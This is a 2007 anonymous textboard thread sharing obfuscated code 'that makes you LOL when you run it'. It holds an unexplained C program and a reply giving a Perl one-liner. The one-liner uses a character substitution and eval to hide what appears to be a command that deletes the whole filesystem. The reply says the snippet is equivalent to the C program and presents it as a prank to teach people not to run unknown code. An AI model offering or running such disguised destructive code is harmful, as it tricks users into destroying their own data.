Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

obfuscated code

Name: Anonymous 2007-11-09 21:00

ITT, obfuscated code that makes you LOL when you run it.

// build with GCC
#include <stdio.h>
int main(int c,char**v) {
        char *s="B+p:ubYBGG0,|M3B=1*0N\n"
                "it's touring complete\n",*k[]={s+21,--s};
        return c?({while(main(!k,k))putchar(**k^*k[1]-10);0;}):(v[1]++,*++*v);
}

Name: Anonymous 2007-11-13 5:10

[spoiler]Equivalent code slightly deobfuscated:
$_ = "=]=>%-{<-|}<&|`{/";
tr~ -/:-@[-`{-}~`-{/" -~;
eval $_;

should be able to figure it out from there. Not that this is very well obfuscated, as it's mostly reliant on a simple character substitution.

cute little one-liner, though, and good for teaching dumbasses not to exec code unless they know what it does[/spoiler]

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List